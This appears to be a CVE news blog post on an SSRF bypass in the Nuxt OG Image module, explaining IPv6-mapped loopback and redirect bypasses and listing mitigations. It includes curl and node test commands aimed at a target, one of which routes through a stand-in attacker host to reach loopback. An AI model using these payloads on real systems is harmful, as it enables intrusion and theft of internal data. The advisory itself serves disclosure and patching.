Nuxt OG Image, SSRF Bypass, GHSA-pqhr-mp3f-hrpp (Critical)

By /

Listen to this Post

How the mentioned CVE works (approx. 20 lines):

The original GHSA-pqhr-mp3f-hrpp (fixed in [email protected]) attempted to block internal IP requests via isBlockedUrl(). However, the fix is incomplete in the latest release 6.4.8. Two independent bypasses exist:
1. Incomplete IPv6 prefix list – The validator only blocks ::1, fc, fd, fe80. It misses critical ranges:
– `[::ffff:7f00:1]` – IPv6‑mapped IPv4 loopback (reaches 127.0.0.1).
– `[fec0::/10]` – RFC 3879 site‑local (deprecated but routable).
– `[5f00::/16]` – RFC 9602 SRv6 SIDs.
– `[3fff::/20]` – RFC 9637 IPv6 documentation v2.
– `[64:ff9b:1::/48]` – RFC 8215 NAT64, includes embedded loopback.
2. No redirect re‑validation – `isBlockedUrl()` runs only on the initial <img src>. The subsequent `$fetch()` follows 30x redirects by default (ofetch, redirect: "follow") without checking the destination. An attacker‑controlled CDN or S3 redirect rule can return a 302 to http://127.0.0.1/`, completing SSRF.
The vulnerable code lives indist/runtime/server/og-image/core/plugins/imageSrc.js. It uses a hand‑rolled IPv6 prefix list and does not re‑validate after redirects. Empirical tests confirm `[::ffff:7f00:1]` reaches loopback on IPv4‑only hosts, and a 302 to internal IP succeeds.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Nuxt nuxt-og-image
Version: 6.4.8 (latest)
Vulnerability : SSRF Bypass
Severity: Critical
date: 2026-05-08
<h2 style="color: blue;">Prediction: 2026-05-22</h2>
<h2 style="color: blue;">What Undercode Say:</h2>

Test IPv6-mapped loopback bypass
curl -v "http://target/og?img=http://[::ffff:7f00:1]:8765/secret"
Test redirect amplifier
curl -v "http://target/og?img=http://attacker.com/redirect-to-127.0.0.1"
Ofetch default redirect follow (source)
node -e "import('ofetch').then(({ $fetch }) => $fetch('http://lab.menna.website/test/redirect-to-loopback', { responseType: 'arrayBuffer' }).catch(e=>console.log(e)))"

<h2 style="color: blue;">Exploit:</h2>
Attacker supplies a crafted URL via an OG image parameter (e.g.,?avatar=). If the URL is an IPv6‑mapped loopback likehttp://[::ffff:7f00:1]:8080/admin` or a 302 endpoint that redirects to 127.0.0.1, the Nuxt server fetches the internal resource and embeds its response (bytes, HTML, JSON) into the generated OG image, exfiltrating sensitive data.

Protection from this CVE:

  • Replace hand‑rolled IPv6 checks with `ipaddr.js` and explicitly deny fec0::/10, 5f00::/16, 3fff::/20, 64:ff9b:1::/48.
  • Widen `RE_MAPPED_V4` to catch `::ffff:7f00:1` without requiring dotted‑quad.
  • Use `redirect: “manual”` in `$fetch` and reject any 3xx.
  • Pin resolved IP via custom `undici.Agent` to enforce validation on every hop.

Impact:

SSRF allows reading loopback services (admin dashboards, internal APIs, metadata endpoints like AWS IMDSv1/v2), scanning internal networks, and accessing NAT64/SRv6 resources. In self‑hosted Nuxt deployments, any process bound to `127.0.0.1` (Redis UI, HTTP‑RPC, memcached) can be leaked as part of the rendered OG image. The module is official and widely used, making many production Nuxt apps vulnerable.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top